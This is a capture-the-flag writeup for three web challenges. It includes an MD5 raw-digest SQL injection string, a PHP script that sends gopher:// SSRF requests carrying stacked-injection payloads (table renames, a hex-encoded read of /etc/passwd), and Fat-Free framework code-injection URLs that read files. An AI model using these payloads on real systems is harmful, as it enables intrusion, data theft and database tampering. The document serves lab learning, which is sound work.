Preface

18th overall, first in the enterprise bracket; the university bracket was far too competitive.


But honestly, the challenge quality really was not great.

There is one more Web challenge, Internal System, which I will write up once the reproduction environment is set up.

WEB1 "慢慢做" (Take It Slow) Management System

Steps:

So challenges like this actually exist.


Only after reading the hint did I learn that the password is MD5-hashed and then concatenated straight into the SQL statement.

https://blog.werner.wiki/php-md5-true-sqli/

So it is MD5 injection: find a string whose MD5, taken as raw bytes, contains the characters for 'or'.

ffifdyop is blocked, but 129581926211651571912466741651878684928 works.
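As an added example (not code from the writeup), the following Python/sqlite3 model shows why md5($password, true) spliced into a query can be bypassed with the two strings above, next to the parameterised fix; the admin table, its columns and the stored password are constructed here.

```python
import hashlib
import sqlite3

# Constructed sample database standing in for the challenge's admin table;
# the stored hash belongs to an arbitrary password chosen for this example.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO admin VALUES (1, 'admin', ?)",
                (hashlib.md5(b"correct-horse").hexdigest(),))
    return con

def raw_md5_as_text(password):
    # PHP's md5($p, true) returns the 16 raw digest bytes, and PHP strings are
    # byte strings, so those bytes land in the SQL text unchanged. latin-1 maps
    # each byte to exactly one character, which models that in Python.
    return hashlib.md5(password.encode()).digest().decode("latin-1")

def digest_carries_quote(password):
    # Defender-side check: a raw digest containing 0x27 (') breaks out of the
    # string literal it is concatenated into.
    return b"'" in hashlib.md5(password.encode()).digest()

def login_vulnerable(con, username, password):
    # The pattern the challenge used: raw digest concatenated into the query.
    # A digest ending in 'or'8 turns the WHERE clause into
    #   (username = 'admin' AND password = '...') OR '8', which is always true.
    sql = ("SELECT id FROM admin WHERE username = '%s' AND password = '%s'"
           % (username, raw_md5_as_text(password)))
    return con.execute(sql).fetchone()

def login_fixed(con, username, password):
    # Bound parameters are never parsed as SQL, and comparing the hex digest
    # keeps quote bytes out of the statement entirely.
    sql = "SELECT id FROM admin WHERE username = ? AND password = ?"
    digest = hashlib.md5(password.encode()).hexdigest()
    return con.execute(sql, (username, digest)).fetchone()
```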

After logging in there is an SSRF endpoint.


I tried it: requesting admin.php through this endpoint no longer returns a 302, so I wrote a script to play with it and to test username and password more conveniently. Testing showed stacked injection.

<?php
// Builds a raw HTTP request for admin.php, wraps it in a gopher:// URL and
// sends it through the challenge's ssrf.php endpoint, echoing the response.
// Payloads used earlier during the solve are kept below, commented out.
//$payload = "username=admin'/**/or/**/1=2;PREPARE jwt from 0x73656c656374202a2066726f6d207265616c5f61646d696e5f686572655f646f5f796f755f66696e643b;EXECUTE jwt;##&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=2;RENAME TABLE `fake_admin` TO `fake_admin1`;RENAME TABLE `real_admin_here_do_you_find` TO `fake_admin`;##&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;RENAME TABLE `fake_admin` TO `fake_admin1`;RENAME TABLE `user2` TO `fake_admin`;##&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;use ctf;show tables;RENAME TABLE ctf.users TO ctf2.user2;RENAME TABLE ctf2.real_admin_here_do_you_find TO ctf.users;show columns from users;##&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;show global variables;#&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;PREPARE jwt from 0x73656c656374206c6f61645f66696c6528272f6574632f70617373776427293b;EXECUTE jwt;;#&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;show tables;#&password=129581926211651571912466741651878684928";
//$payload = "username=admin_inner';show columns from fake_admin;show columns from real_admin_here_do_you_find;&password=5fb4e07de914cfc82afb44vbaf402203";
//$payload = "username=admin&password=5fb4e07de914cfc82afb44vbaf402203";
$payload = "username=admin'/**/or/**/1=1;show/**/tables;#&password=fake_password";
$test = "POST /admin.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
cache-control: no-cache
User-Agent: PostmanRuntime/7.6.0
Cookie: PHPSESSID=lh0aib3rhtu7eausnf46h7u9m7
Accept: */*
Host: 127.0.0.1
Content-Length: ".strlen($payload)."
Connection: close
".$payload."


";
//$payload = "username=admin_inner&password=5fb4e07de914cfc82afb44vbaf402203";
//$test = "GET /flag.php HTTP/1.1
//Content-Type: application/x-www-form-urlencoded
//X-Forwarded-For: 127.0.0.1
//cache-control: no-cache
//User-Agent: PostmanRuntime/7.6.0
//Cookie: PHPSESSID=lh0aib3rhtu7eausnf46h7u9m7
//Accept: */*
//Host: 127.0.0.1
//Connection: close
//
//";
echo("gopher://127.0.0.1:80/_".rawurlencode($test));
$curl = curl_init();
curl_setopt_array($curl, array(
    CURLOPT_URL => "http://eci-2ze3piaq8eraibp8xg73.cloudeci1.ichunqiu.com/ssrf.php?way=".rawurlencode("gopher://127.0.0.1:80/_".rawurlencode($test)),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_ENCODING => "",
    CURLOPT_MAXREDIRS => 10,
    CURLOPT_TIMEOUT => 30,
    CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
    CURLOPT_CUSTOMREQUEST => "GET",
    CURLOPT_POSTFIELDS => "",
    CURLOPT_HTTPHEADER => array(
        "Cookie: PHPSESSID=lh0aib3rhtu7eausnf46h7u9m7",
        "cache-control: no-cache"
    ),
));
$response = curl_exec($curl);
$err = curl_error($curl);
curl_close($curl);
if ($err) {
    echo "cURL Error #:" . $err;
} else {
    echo $response;
}


Then the usual routine: following the method at https://www.zhaoj.in/read-5873.html#0x04, rename the tables and read the contents. (While reproducing this for the writeup at night I got stuck, even though it worked in the afternoon. Absurd. Luckily I had saved the password back then.)

$payload = "username=admin'/**/or/**/1=2;RENAME TABLE `fake_admin` TO `fake_admin1`;RENAME TABLE `real_admin_here_do_you_find` TO `fake_admin`;##&password=129581926211651571912466741651878684928";

Result:

array(1) {
  [0]=>
  array(3) {
    ["id"]=>
    string(1) "1"
    ["username"]=>
    string(11) "admin_inner"
    ["password"]=>
    string(32) "5fb4e07de914cfc82afb44vbaf402203"
  }
}

Then comes the most far-fetched part of this challenge: you have to log in using this password together with the username admin.

$payload = "username=admin&password=5fb4e07de914cfc82afb44vbaf402203";


gopher://127.0.0.1:80/_POST%20%2Fadmin.php%20HTTP%2F1.1%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0AX-Forwarded-For%3A%20127.0.0.1%0Acache-control%3A%20no-cache%0APostman-Token%3A%20375ba985-8106-4d79-bafd-dff6654589b8%0AUser-Agent%3A%20PostmanRuntime%2F7.6.0%0ACookie%3A%20PHPSESSID%3Du470ueuprk7mtfhpiasfu50561%0AAccept%3A%20%2A%2F%2A%0AHost%3A%20127.0.0.1%0AContent-Length%3A%2056%0AConnection%3A%20close%0A%0Ausername%3Dadmin%26password%3D5fb4e07de914cfc82afb44vbaf402203%0A%0A%0A%0A%0A


Then visit /flag.php and that is it.


Flag:

flag{0e691080-310e-414a-aa02-6de9d6d2826a}

WEB2 Sign-in

Steps:

Only after seeing the hint did I realise it called for the PHP backdoor used a few days earlier.


Flag:

flag{394ee197-512a-4e45-b2bf-3072da63eff1}

WEB3 unsetme

Steps:

Open it.


From the code and a quick web search, it is the F3 (Fat-Free) framework.

Copy the code locally, turn on error reporting, and trace the code; it leads to line 530 of lib/base.php.


Print it out and you can see that the code generated for unset has the parameter a concatenated into it.


So the task is to close off the generated code so that it stays syntactically valid.

/?a=a%0a);%0aphpinfo(


Then the flag can be read.

/?a=a%0a);%0aecho file_get_contents(%27/flag%27


Flag:

flag{1a2e31bd-45de-46d8-82d2-d89e50135cda}